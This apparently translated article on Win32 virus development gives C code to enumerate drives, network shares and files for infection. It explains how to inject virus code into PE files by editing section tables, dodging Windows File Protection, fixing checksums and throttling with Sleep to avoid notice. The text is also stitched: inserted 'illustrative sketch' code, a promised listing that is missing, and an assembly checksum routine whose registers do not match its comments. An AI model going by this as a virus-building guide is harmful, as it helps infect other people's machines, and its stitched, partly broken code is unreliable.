File search is one of the important functional modules of a virus and the key to infection and propagation. Modern Windows and the file systems of various removable media may use a variety of complex formats, so accessing the file system directly (reading and writing sectors), as some DOS viruses did, is no longer practical. Instead, the Win32 API functions FindFirstFile and FindNextFile are usually used to enumerate all directories and files in the current directory. The attributes of each result show whether it is a directory or a file; executable files are infected according to the predesigned infection strategy. Every subdirectory of the current directory (except the special . and .. entries) can be traversed with the same two APIs, recursively or non-recursively, so starting from any drive or network shared folder it is possible to traverse all files and directories on that drive or share. The search generally starts from the root of a drive or shared folder, so how do we get the list of all drives and all shared folders in the current system? For the first question, we know that Windows supports 26 logical drives, A: to Z:, so we can try every drive letter starting from A: and use the Win32 API GetDriveType to determine whether the drive exists and whether it is a fixed hard disk, a removable medium, a CD-ROM, or a network drive. Viruses generally infect only fixed hard disks and network drives. Because assembly language is too verbose for expressing algorithms, the algorithm parts are described in C; converting the C code into assembly is a simple process. The following code, enumdisk.cpp, displays the type of each drive from A: to Z:

#include <windows.h>
#include <stdio.h>
#include <string.h>

#define MAX_DRIVENAME_LENGTH 64

int __cdecl main(int argc, char *argv[])
{
    char drivename[MAX_DRIVENAME_LENGTH];
    char *p;
    unsigned int drv_attr;

    p = drivename;
    // GetDriveType expects a root path with a trailing backslash
    strncpy(drivename, "a:\\", MAX_DRIVENAME_LENGTH);
    for (; *p <= 'z'; ++*p) {
        drv_attr = GetDriveType(p);
        switch (drv_attr) {
        case DRIVE_UNKNOWN:     // unknown type
            printf("drive %s type %s\n", p, "DRIVE_UNKNOWN");
            break;
        case DRIVE_NO_ROOT_DIR: // this drive does not exist
            printf("drive %s type %s\n", p, "DRIVE_NO_ROOT_DIR");
            break;
        case DRIVE_REMOVABLE:   // removable disk: floppy, USB disk, portable hard disk, etc.
            printf("drive %s type %s\n", p, "DRIVE_REMOVABLE");
            break;
        case DRIVE_FIXED:       // fixed hard disk
            printf("drive %s type %s\n", p, "DRIVE_FIXED");
            break;
        case DRIVE_REMOTE:      // usually a mapped network drive
            printf("drive %s type %s\n", p, "DRIVE_REMOTE");
            break;
        case DRIVE_CDROM:       // CD-ROM
            printf("drive %s type %s\n", p, "DRIVE_CDROM");
            break;
        case DRIVE_RAMDISK:     // RAM disk
            printf("drive %s type %s\n", p, "DRIVE_RAMDISK");
            break;
        }
    }
    return 0;
}

Unlike this example, which only displays information, a virus calls a file enumeration function (such as the enum_path function given later) to traverse, from the root directory, all files on each DRIVE_FIXED drive and infects them according to a predefined policy.

Network resources are also organized as a tree. Non-leaf nodes are called containers, and a container must be searched further until the leaf nodes are reached; the leaf nodes are the root paths of shared resources. Shared resources are generally of two types: shared printers and shared folders. Network shares are enumerated recursively with WNetOpenEnum and WNetEnumResource; for their prototypes and parameter meanings, see MSDN. The following code, enumshare.cpp, displays all network shared folders:

#include <windows.h>

#include <stdio.h>
#include <stdlib.h>

#pragma comment(lib, "mpr.lib")

int enum_netshare(LPNETRESOURCE lpnr);

int __cdecl main(int argc, char *argv[])
{
    enum_netshare(0);
    return 0;
}

int enum_netshare(LPNETRESOURCE lpnr)
{
    DWORD r, rEnum;
    HANDLE hEnum;
    DWORD cbBuffer = 16384;
    DWORD cEntries = -1;
    LPNETRESOURCE lpnrLocal; // pointer to an array of NETRESOURCE structures
    DWORD i;

    r = WNetOpenEnum(RESOURCE_GLOBALNET, // scope: all network resources
                     RESOURCETYPE_DISK,  // type: enumerate storage resources only
                     RESOURCEUSAGE_ALL,  // usage: all
                     lpnr,               // NULL on the first call
                     &hEnum);            // receives the enumeration handle
    if (r != NO_ERROR) {
        printf("WNetOpenEnum error....\n");
        return FALSE;
    }
    lpnrLocal = (LPNETRESOURCE)malloc(cbBuffer);
    if (lpnrLocal == NULL)
        return FALSE;
    do {
        ZeroMemory(lpnrLocal, cbBuffer);
        rEnum = WNetEnumResource(hEnum,
                                 &cEntries,  // return as many entries as possible
                                 lpnrLocal,  // LPNETRESOURCE buffer
                                 &cbBuffer); // buffer size
        if (rEnum == NO_ERROR) {
            for (i = 0; i < cEntries; i++) {
                if (lpnrLocal[i].dwUsage & RESOURCEUSAGE_CONTAINER) {
                    // a container: enumerate its children recursively
                    enum_netshare(&lpnrLocal[i]);
                } else {
                    // Here the virus can call the traversal function to traverse
                    // all files under this shared folder:
                    // enum_path(lpnrLocal[i].lpRemoteName);
                    printf("find %s -> %s\n", lpnrLocal[i].lpLocalName, lpnrLocal[i].lpRemoteName);
                }
            }
        } else if (rEnum != ERROR_NO_MORE_ITEMS) {
            printf("WNetEnumResource error....\n");
            break;
        }
    } while (rEnum != ERROR_NO_MORE_ITEMS);
    free((void *)lpnrLocal);
    r = WNetCloseEnum(hEnum);
    if (r != NO_ERROR) {
        printf("WNetCloseEnum error....\n");
        return FALSE;
    }
    return TRUE;
}

When the traversal starts, the fourth parameter of WNetOpenEnum is 0; when a shared container is discovered, the parameter is a pointer to the NETRESOURCE structure of that container. In the NETRESOURCE structure, the member we are interested in is lpRemoteName: if it is not 0, it identifies a valid shared container or shared folder.

typedef struct _NETRESOURCE {
    DWORD dwScope;
    DWORD dwType;
    DWORD dwDisplayType;
    DWORD dwUsage;
    LPTSTR lpLocalName;
    LPTSTR lpRemoteName;
    LPTSTR lpComment;
    LPTSTR lpProvider;
} NETRESOURCE;

With the starting directories settled, FindFirstFile and FindNextFile can be used from each of them to enumerate all files and directories beneath it. The traversal can be depth-first or breadth-first; depth-first is the more common choice. It can be implemented either recursively or non-recursively. A recursive search consumes stack space and could in principle exhaust the stack and raise an exception, although this rarely happens in practice. A non-recursive search has no such problem, but its code is slightly more complex. In practice, recursive traversal is used most. When searching, pass *.* as the first parameter to match all files, then check the dwFileAttributes member of the resulting WIN32_FIND_DATA structure to determine whether the entry is a directory. If it is a directory, continue by traversing that subdirectory; otherwise, use the cFileName member of WIN32_FIND_DATA to decide from the file suffix whether it is a file to infect, and act accordingly. The following code recursively searches a directory and all of its subdirectories:

void enum_path(char *cpath) // cpath is expected to be an absolute path
{
    WIN32_FIND_DATA wfd;
    HANDLE hfd;
    char cdir[MAX_PATH];
    char subdir[MAX_PATH];
    int r;

    GetCurrentDirectory(MAX_PATH, cdir); // remember the caller's directory
    SetCurrentDirectory(cpath);
    hfd = FindFirstFile("*.*", &wfd);
    if (hfd != INVALID_HANDLE_VALUE) {
        do {
            if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
                if (wfd.cFileName[0] != '.') {
                    // build the full path name
                    sprintf(subdir, "%s\\%s", cpath, wfd.cFileName);
                    // recursively enumerate the subdirectory
                    enum_path(subdir);
                }
            } else {
                printf("%s\\%s\n", cpath, wfd.cFileName);
                // a virus can decide from the suffix whether to infect this file
            }
        } while (r = FindNextFile(hfd, &wfd), r != 0);
        FindClose(hfd);
    }
    SetCurrentDirectory(cdir);
}

In little more than 20 lines of C, file traversal is implemented. The power of the Win32 API is a convenience not only for developers but also for viruses. The assembly implementation is slightly more complex; interested readers can refer to the enum_path part of Elkern. The principle is the same, and for reasons of space the assembly code is not given here. A non-recursive search does not keep its state on the call stack. Instead it stores that state in an explicitly allocated linked list, stack, or similar structure and uses an iterative loop to perform the traversal. The following is a simple implementation that uses a linked list to hold the list of subdirectories:

When this is implemented in assembly language, the linked list must be managed and its nodes allocated and released, so it is more cumbersome and the code is somewhat larger; viruses therefore mostly use the recursive approach. It is worth noting that searching deep directory trees takes a long time, so most viruses call Sleep periodically during the search to keep CPU usage from rising high enough to alert attentive users. The file search and infection modules usually run in a separate thread: after the virus gains control, it creates the search and infection thread and then hands control back to the original program.

* Modification and infection strategy of PE file

Now that all files on disks and network shares can be searched, the natural next step for a parasite is to infect the PE files it finds. An important consideration in infecting a PE is how to write the virus code into the PE file. Files are generally read and written through memory-mapped files, using Win32 APIs such as CreateFile, CreateFileMapping, and MapViewOfFile, which avoids the trouble of managing buffers and is therefore used by many viruses. To be able to write to read-only files, the virus first calls GetFileAttributes to obtain and save the file's attributes, then calls SetFileAttributes to make the file writable, and restores the original attributes after the infection is complete. Generally speaking, there are several ways to infect a PE file:

a) Add a new section. The virus code is written into a new section, and the section table, the file size, and related values in the file header are modified. Because an extra section appears at the end of the PE, this is easily noticed. In some cases the original PE header has no room for the new section table entry, so other data must be moved as well. Because of these problems, few PE viruses use this method.
b) Append to the last section. The size and attributes in the last section table entry and values such as the file size in the file header are modified. Because more and more anti-virus software scans the tail of the file, many viruses append random data after the virus code to escape the scan. Many modern PE viruses use this method.
c) Write into the gaps left in the PE header and in each section. The PE header generally occupies 1024 bytes, while the header of an ordinary PE file with 5 or 6 sections actually uses only about 600 bytes, leaving more than 400 bytes available. Sections are generally aligned to 512 bytes, but the actual data in a section often does not use all of the aligned space. The alignment of PE files was designed for efficiency, but the gaps it leaves give viruses room. This method does not increase the total length of the infected file, so it has been favored by virus authors ever since the CIH virus first used it.
d) Overwrite rarely used data, such as the relocation table of an ordinary EXE file. Because an EXE generally does not need relocation, its relocation data can be overwritten without causing problems. To be safe, the corresponding entry in the DataDirectory array in the file header can be cleared. This approach generally does not increase the length of the infected file, so many viruses use it.
e) Compress some data or code to make room, then write the virus code into the freed space. At run time the virus first decompresses the original data or code and then hands control to the original program. This approach generally does not increase the size of the infected file, but there are more factors to consider and it is harder to implement, so it is not widely used.

Whichever method is used, it involves modifying the PE header and the section table. We first look at how a PE file is modified, that is, how a PE file with virus code added can still be loaded and executed by the system loader.

The attributes of each section of a PE file are described by an entry in the section table, and the section table immediately follows IMAGE_NT_HEADERS. So we read the starting offset of IMAGE_NT_HEADERS from file offset 0x3c and add the size of IMAGE_NT_HEADERS (248 bytes) to locate the start of the section table. Each table entry is an IMAGE_SECTION_HEADER structure:

typedef struct _IMAGE_SECTION_HEADER {
    BYTE Name[IMAGE_SIZEOF_SHORT_NAME]; // name of the section
    union {
        DWORD PhysicalAddress;
        DWORD VirtualSize;              // actual size in bytes
    } Misc;
    DWORD VirtualAddress;               // starting virtual address
    DWORD SizeOfRawData;                // size aligned to FileAlignment in the file header
    DWORD PointerToRawData;             // offset of this section in the file
    DWORD PointerToRelocations;
    DWORD PointerToLinenumbers;
    WORD NumberOfRelocations;
    WORD NumberOfLinenumbers;
    DWORD Characteristics;              // attributes
} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;

The number of section table entries is given by the NumberOfSections member in IMAGE_NT_HEADERS. The starting virtual address and the file position recorded in each section table entry define the mapping between virtual addresses in memory and offsets in the file. To add a section, an entry must be added to the section table and NumberOfSections increased. Note that in some PE files the section table is followed by other data, such as Bound Import data. In that case an entry cannot simply be appended: the data must first be moved and the structures that refer to it updated, otherwise the PE file will not run normally. Because many viruses are self-modifying, the section Characteristics value is typically set to E000XXXX, marking the section readable, writable, and executable; otherwise the virus has to call VirtualProtect at startup to change the protection of its memory pages dynamically. The definition above also shows that the raw data of each section is aligned to FileAlignment in the file header. This value is generally 512, so each section may contain up to 512 bytes of unused space (SizeOfRawData - VirtualSize), which viruses can exploit. The famous CIH virus was the first to use this technique. The difficulty is that the size of the gap in each section is not fixed, so the virus code has to be split into several parts and reassembled at run time. The advantage is that if the virus code is small, the PE file does not need to grow, which makes the infection more stealthy. If all the unused space together is still too small for the virus code, a section can be added or the code can be appended to the last section. Appending to the last section is relatively simple: only the VirtualSize of the last section table entry and its SizeOfRawData member, aligned to FileAlignment, need to be changed.
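For readers who inspect PE files, the two calculations mentioned above (rounding a size up to FileAlignment, and translating a virtual address into a file offset through the section table) can be sketched in portable C. This is an illustrative sketch, not code from the article: the `section_info` type and both function names are hypothetical, and the structure carries only the four IMAGE_SECTION_HEADER fields the calculation needs.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for the IMAGE_SECTION_HEADER fields used here. */
typedef struct {
    uint32_t virtual_address;     /* VirtualAddress */
    uint32_t virtual_size;        /* Misc.VirtualSize */
    uint32_t pointer_to_raw_data; /* PointerToRawData */
    uint32_t size_of_raw_data;    /* SizeOfRawData */
} section_info;

/* Round value up to a multiple of alignment (a power of two, e.g. 0x200). */
uint32_t align_up(uint32_t value, uint32_t alignment)
{
    assert(alignment != 0 && (alignment & (alignment - 1)) == 0);
    return (value + alignment - 1) & ~(alignment - 1);
}

/* Translate an RVA to a file offset.
 * Returns -1 when no section's raw data covers the RVA. */
int64_t rva_to_file_offset(const section_info *sections, size_t count, uint32_t rva)
{
    for (size_t i = 0; i < count; i++) {
        uint32_t start = sections[i].virtual_address;
        if (rva >= start && rva - start < sections[i].size_of_raw_data)
            return (int64_t)sections[i].pointer_to_raw_data + (rva - start);
    }
    return -1;
}
```

For a section with VirtualAddress 0x1000 and PointerToRawData 0x400, the RVA 0x1010 maps to file offset 0x410, and a VirtualSize of 0x1234 rounds up to a SizeOfRawData of 0x1400 under a FileAlignment of 0x200.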
Of course, with any of the modifications described above, if the size of the file changes, the SizeOfImage value in the file header must be corrected. It is the sum of the sizes of the header and all sections, each aligned to SectionAlignment. Two problems deserve attention here. The first is the handling of files protected by WFP (Windows File Protection), a mechanism for protecting system files introduced in Windows 2000. If the system discovers that an important system file has been changed, it pops up a dialog warning the user that the file has been replaced. There are various ways to bypass WFP, but for a virus the simpler method is not to infect system files in the WFP list. The export function SfcIsFileProtected of sfc.dll determines whether a file is in this list: its first parameter must be 0, its second parameter is the file name to check, and it returns a non-zero value if the file is in the list and 0 otherwise. The other problem is the PE checksum. Most PE files do not use the CheckSum field in the file header, but for some PE files, such as key system service programs and driver files, the value must be correct or the system loader will refuse to load them. The CheckSum of the PE header can be calculated with the export function CheckSumMappedFile of imagehlp.dll, or with the following simple equivalent algorithm: if the PE file size is odd, pad it with a 0 byte to an even length; clear the CheckSum field of the PE header to 0; accumulate the file two bytes at a time with ADC (add with carry); finally, add the actual file size to the accumulated sum. The result is the checksum value.
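The checksum description above can be sketched in portable C. This follows the article's wording (16-bit words added with end-around carry, CheckSum field counted as zero, file length added at the end); it has not been verified here against CheckSumMappedFile. The function name `pe_checksum` and the `checksum_offset` parameter (the file offset of the CheckSum field, assumed to be even) are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Sketch of the checksum described in the text.
 * data/len        - the whole file image in memory
 * checksum_offset - file offset of the 4-byte CheckSum field (assumed even) */
uint32_t pe_checksum(const uint8_t *data, size_t len, size_t checksum_offset)
{
    assert(data != NULL && checksum_offset % 2 == 0);
    uint32_t sum = 0;
    for (size_t i = 0; i < len; i += 2) {
        uint32_t word = 0;
        /* The two words of the CheckSum field itself count as zero. */
        if (i != checksum_offset && i != checksum_offset + 2) {
            word = data[i];
            if (i + 1 < len)           /* odd length: pad the last byte with 0 */
                word |= (uint32_t)data[i + 1] << 8;
        }
        sum += word;
        sum = (sum & 0xFFFF) + (sum >> 16); /* fold the carry back in (ADC) */
    }
    return sum + (uint32_t)len;
}
```

A tool that validates headers could compare this value with the stored CheckSum field to flag files whose contents changed after linking.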

The following cal_checksum routine assumes that ESI already points to the PE file header, that the CheckSum field in the file header has been cleared to 0, and that the CF flag has been reset:

; call example:
;     clc
;     push pe_filesize
;     call cal_checksum
cal_checksum:
    adc bp, word [esi]   ; initially ESI points to the file header; EBX holds the file size
    inc esi
    inc esi
    loop cal_checksum
    mov ebx, [esp+4]
    adc ebp, ebx         ; EBP holds the PE checksum
    ret 4

Besides the checksum in the PE header, many programs have their own integrity checks, for example WinZip and WinRAR self-extracting files; if such a file is infected, it can no longer be extracted normally. Viruses should therefore avoid infecting PE files of this kind as far as possible. The code with which Elkern modifies the files it infects is in infect.asm. The virus first stores as much of its code as possible in the gaps of the PE header and sections, and if all the gaps are still not enough to hold the virus code, the rest is appended to the last section. For reasons of space the code is omitted here; interested readers may refer to it. In fact, the code fragments for the functions described above already amount to a simple virus when put together, whether written in assembly language, C, or Python. But this is far from all of virus technology. Over decades of confrontation between viruses and anti-virus software, virus technology has improved along with anti-virus technology. Win32 memory-resident infection, anti-analysis techniques, EPO, polymorphism, and metamorphism have not been introduced here for reasons of space; they are the subject of the next part.

* Reflection and prevention

Virus technology originates from programming practice, and it inevitably embodies considerable programming skill. If we are good at borrowing, many of its techniques can be used to solve ordinary programming problems. In addition, knowing the enemy lets us face viruses calmly, analyze their mechanisms, and find better solutions.
For users, understanding how viruses work is also very helpful in choosing suitable anti-virus products and solutions. From the user's perspective, besides regularly running anti-virus software, it is very important to be cautious about downloading or running unknown programs and to stay alert. Viruses are no longer merely a way to show off superior programming skill; more and more they are given economic and sometimes even political purposes. To prevent viruses, a responsible programmer should first of all neither write nor spread them. It starts with each of us.

* References

[1] The PE File Format, Luevelsmeyer
[2] Microsoft Portable Executable and Common Object File Format Specification, Microsoft Corp.
[3] An In-Depth Look into the Win32 Portable Executable File Format, Matt Pietrek
[4] 29A Issue 7

About the author: Wen Yujie, male, works in network security. His main research fields are malicious code, reverse engineering, artificial intelligence, compiler theory, and low-level security technology. He co-translated "Intel Assembly Language Programming" with Luo Yunbin and co-authored "Software Encryption Technology Insider".
